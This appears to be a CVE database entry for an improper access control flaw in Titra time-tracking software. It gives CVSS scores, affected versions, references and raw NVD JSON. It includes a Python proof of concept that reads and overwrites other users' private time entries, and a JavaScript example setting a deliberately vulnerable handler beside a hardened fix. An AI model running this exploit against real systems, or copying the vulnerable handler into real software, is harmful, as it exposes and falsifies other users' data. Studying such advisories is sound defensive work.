Security Vulnerability Report
CVE-2026-21694 CVSS 6.8 MEDIUM

Published: 2026-01-08 00:16:00
Last Modified: 2026-01-12 18:44:36

Description

Titra is open source project time tracking software. Versions 0.99.49 and below have Improper Access Control, allowing users to view and edit other users' time entries in private projects they have not been granted access to. This issue is fixed in version 0.99.50.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

The 6.8 MEDIUM score is the CNA's (GitHub) assessment and rates attack complexity as High. NVD's own analysis, recorded in the raw JSON data at the bottom of this page, rates attack complexity as Low (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N), giving 8.1 HIGH. Both agree on the rest of the vector: any authenticated user (PR:L) can, with no user interaction, read and modify other users' data (C:H/I:H) with no availability impact, and the scope stays within the application. The CNA classifies the weakness as CWE-284 (Improper Access Control); NVD records NVD-CWE-noinfo. When prioritising, treat the 8.1 figure as the realistic one: once a low-privileged account exists, nothing in the description suggests a hard-to-meet precondition.

Configurations (Affected Products)

cpe:2.3:a:kromit:titra:*:*:*:*:*:*:*:* - VULNERABLE
Titra < 0.99.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-21694 PoC - Titra Improper Access Control
# Target: Titra <= 0.99.49
#
# NOTE: the REST paths used below (/api/auth/login, /api/timesheet) are the
# PoC's own assumptions; neither the advisory nor the patch commit referenced on
# this page documents them. Adjust them to the target's actual API before use.
BASE_URL = "http://target-ip:3000"
USERNAME = "user@example.com"  # placeholder credentials for a low-privileged account
PASSWORD = "password123"


def login():
    """Authenticate as a low-privileged user and return the session (None on failure)."""
    session = requests.Session()
    login_data = {"email": USERNAME, "password": PASSWORD}
    resp = session.post(f"{BASE_URL}/api/auth/login", json=login_data)
    return session if resp.status_code == 200 else None


def exploit_unauthorized_access(session):
    """Exploit improper access control to view and edit other users' time entries."""
    headers = {"Content-Type": "application/json"}

    # List time entries, including those in private projects this user was never granted access to
    resp = session.get(f"{BASE_URL}/api/timesheet", headers=headers)
    if resp.status_code == 200:
        entries = resp.json()
        print(f"Found {len(entries)} time entries")
        for entry in entries:
            print(f"Entry ID: {entry.get('id')}, User: {entry.get('userId')}")

    # Try to modify another user's time entry
    entry_id = 123  # Target entry ID (enumerate or guess)
    modify_data = {"hours": 99, "description": "Modified by attacker"}
    resp = session.put(f"{BASE_URL}/api/timesheet/{entry_id}", json=modify_data, headers=headers)
    print(f"Modification attempt: {resp.status_code}")


if __name__ == "__main__":
    session = login()
    if session:
        exploit_unauthorized_access(session)
    else:
        print("Login failed")
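The server-side check whose absence the description and the PoC above describe, as an added example. Titra is a Meteor application, so the example is in JavaScript, but this is not Titra's code: the collection and field names (projects.public, projects.team, timecards.projectId, timecards.userId), the user ids and the access rule itself are assumptions made for the illustration. It puts the vulnerable handler pattern, which trusts a client-supplied entry id and checks only that the caller is logged in, beside a hardened one that resolves the entry's project and the caller's relationship to it from stored state before reading or writing.

```javascript
// Added example, not Titra's code: a minimal model of the server-side access
// check that CVE-2026-21694 describes as missing. Collection and field names
// (projects.public, projects.team, timecards.projectId, ...) and the access
// rule are assumptions for this illustration, not Titra's real schema.

class AccessDenied extends Error {}

// Constructed sample data: one public and one private project owned by alice,
// with bob on the private project's team, and one time entry in each project.
function makeStore() {
  return {
    projects: new Map([
      ["p-public",  { _id: "p-public",  userId: "alice", public: true,  team: [] }],
      ["p-private", { _id: "p-private", userId: "alice", public: false, team: ["bob"] }],
    ]),
    timecards: new Map([
      ["t1", { _id: "t1", projectId: "p-public",  userId: "alice", hours: 2, task: "docs" }],
      ["t2", { _id: "t2", projectId: "p-private", userId: "alice", hours: 5, task: "payroll export" }],
    ]),
  };
}

// Assumed rule: a user may see a project's entries if the project is public,
// they own it, or they are on its team.
function canReadProject(userId, project) {
  return project.public === true
    || project.userId === userId
    || (Array.isArray(project.team) && project.team.includes(userId));
}

// Assumed rule: editing an entry additionally requires owning the entry or the project.
function canEditTimecard(userId, project, tc) {
  return canReadProject(userId, project) && (tc.userId === userId || project.userId === userId);
}

// VULNERABLE pattern: the handler trusts the client-supplied entry id and only
// checks that the caller is logged in and that the record exists, so any
// authenticated user can edit any entry, private projects included.
function updateTimecardVulnerable(store, userId, timecardId, changes) {
  if (!userId) throw new AccessDenied("not logged in");
  const tc = store.timecards.get(timecardId);
  if (!tc) throw new Error("no such entry");
  Object.assign(tc, changes);
  return { ...tc };
}

// HARDENED pattern: look up the entry's project server-side and decide from
// stored state, never from client input, whether this caller may touch it.
function updateTimecardHardened(store, userId, timecardId, changes) {
  if (!userId) throw new AccessDenied("not logged in");
  const tc = store.timecards.get(timecardId);
  if (!tc) throw new Error("no such entry");
  const project = store.projects.get(tc.projectId);
  if (!project || !canEditTimecard(userId, project, tc)) {
    throw new AccessDenied(`${userId} may not edit entry ${timecardId}`);
  }
  // Allow-list writable fields so the caller cannot reassign ownership or move
  // the entry into a project they control.
  for (const key of Object.keys(changes)) {
    if (!["hours", "task"].includes(key)) throw new Error(`field not writable: ${key}`);
  }
  Object.assign(tc, changes);
  return { ...tc };
}

// Reads are gated the same way: the project check runs before any entry is returned.
function listTimecardsHardened(store, userId, projectId) {
  const project = store.projects.get(projectId);
  if (!project || !canReadProject(userId, project)) {
    throw new AccessDenied(`${userId} may not view project ${projectId}`);
  }
  return [...store.timecards.values()].filter((tc) => tc.projectId === projectId);
}

// Replays the advisory's scenario: mallory is authenticated but has no grant on
// p-private. Returns what each variant lets her do.
function demo() {
  const result = {};
  const attack = { hours: 99, task: "modified by attacker" };

  const v = makeStore();
  result.vulnerableEditHours = updateTimecardVulnerable(v, "mallory", "t2", attack).hours;

  const h = makeStore();
  try {
    updateTimecardHardened(h, "mallory", "t2", attack);
    result.hardenedEdit = "allowed";
  } catch (e) {
    result.hardenedEdit = e instanceof AccessDenied ? "denied" : "error";
  }
  result.hardenedHours = h.timecards.get("t2").hours; // untouched by the rejected edit

  try {
    listTimecardsHardened(h, "mallory", "p-private");
    result.hardenedList = "allowed";
  } catch (e) {
    result.hardenedList = e instanceof AccessDenied ? "denied" : "error";
  }
  result.publicListCount = listTimecardsHardened(h, "mallory", "p-public").length;
  result.teamListCount = listTimecardsHardened(h, "bob", "p-private").length;
  return result;
}

console.log(demo());
```

Run with node. demo() shows the vulnerable handler letting mallory overwrite alice's entry in the private project, while the hardened one rejects both the edit and the listing yet still serves the public project to her and the private project to team member bob. The field allow-list is a separate safeguard from the project check: without it, a caller could set projectId or userId on an entry they may edit and launder it into a project they control.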

References

https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c (Vendor Advisory, Exploit)
https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938 (Patch)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-21694",
    "sourceIdentifier": "security-advisories@github.com",
    "published": "2026-01-08T00:15:59.680",
    "lastModified": "2026-01-12T18:44:36.047",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Titra is open source project time tracking software. Versions 0.99.49 and below have Improper Access Control, allowing users to view and edit other users' time entries in private projects they have not been granted access to. This issue is fixed in version 0.99.50."
      },
      {
        "lang": "es",
        "value": "Titra es un software de seguimiento de tiempo de proyectos de código abierto. Las versiones 0.99.49 e inferiores tienen un Control de Acceso Inadecuado, permitiendo a los usuarios ver y editar las entradas de tiempo de otros usuarios en proyectos privados a los que no se les ha concedido acceso. Este problema se ha solucionado en la versión 0.99.50."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security-advisories@github.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.2
        },
        {
          "source": "nvd@nist.gov",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security-advisories@github.com",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-284"}]
      },
      {
        "source": "nvd@nist.gov",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:kromit:titra:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "0.99.50",
                "matchCriteriaId": "271EC7B1-5D87-473E-A67A-C9DCE59DA114"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938",
        "source": "security-advisories@github.com",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c",
        "source": "security-advisories@github.com",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}